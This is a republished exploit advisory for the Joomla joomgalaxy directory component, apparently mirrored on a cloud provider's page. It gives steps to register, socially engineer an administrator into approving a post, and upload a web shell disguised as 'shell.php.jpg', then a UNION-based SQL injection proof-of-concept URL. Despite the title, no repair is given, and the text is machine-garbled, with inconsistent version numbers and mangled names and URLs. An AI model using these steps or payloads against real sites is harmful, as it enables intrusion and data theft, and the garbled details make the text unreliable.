Joomla joomgal20171.2.0.4 multiple defects and repair

Source: Internet
Author: User

Title: Joomla joomgal4241.2.0.4 Multiple Vulnerabilites
 
By Daniel Barragan "D4NB4R"
Developer: http://www.joomgalaxy.com/
 
Affected Versions: 1.2.0.4 (last update on Jul 27,201 2)
 
Test Platform: [Linux (bt5)-Windows (7 ultimate)]
 
Introduction
Joomgalaxy is a rich, comprehensive directory component brimming with unique
Features like Entry comparison, Pay per download, Tagging, Email Cloaking,
Review and Rating with Multiple Attributes, add Articles to Entries,
With faster more plus all standard directory features as well.
 
 
1. Illegal File Upload
 

 
1a. Go to this route, Complete the form and login the site
Ingrese a esta ruta, Complete el formulario e ingrese al sitio

A http://www.bkjia.com/index. php? Option = com_users & view = registration
 
 
1b. go to the following link and create a new post (sometimes it ask
Confirmation of an administrator)
So then create the post with something of social engineering and wait
For a confirmation, if not forget this step
 
Vaya a este enstmcree un nuevo anuncio "Algunas veces pide confirmacion de administrador"
Asi que cree el anuncio con algo de ingenieria social y espere que confirmen
Si no omita este paso
 
A http://www.bkjia.com/index. php? Option = com_joomgalaxy & view = addentry
 
 
1c. once the post is published go to the tab images and upload your shell in
Following way: shell.php.jpg
Una vez resgistrado el anuncio dirijase a la pestaña imagenes y suba su
Shell de la siguiente forma
Shell.php.jpg


1d. Find your shell in the path
Busque su shell en este path
 
Http://www.bkjia.com/administrator/components/com_joomgalaxy/assets/images/Image_gallery/randomid_shell.php.jpg
 
 
2. SQL Injection
 

P0c:
 
A http://www.bkjia.com/index. php? Option = com_joomgalaxy & view = categorylist & type = thumbnail & lang = en & catid = 100000001-100000001 = 0
Union (select 1, database (), 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13)
 
 

Gretz: devboot, P1l0tcast, ksha, dedalo, etc ..

 
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________
Daniel barriers Ragan "D4NB4R" 2012

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.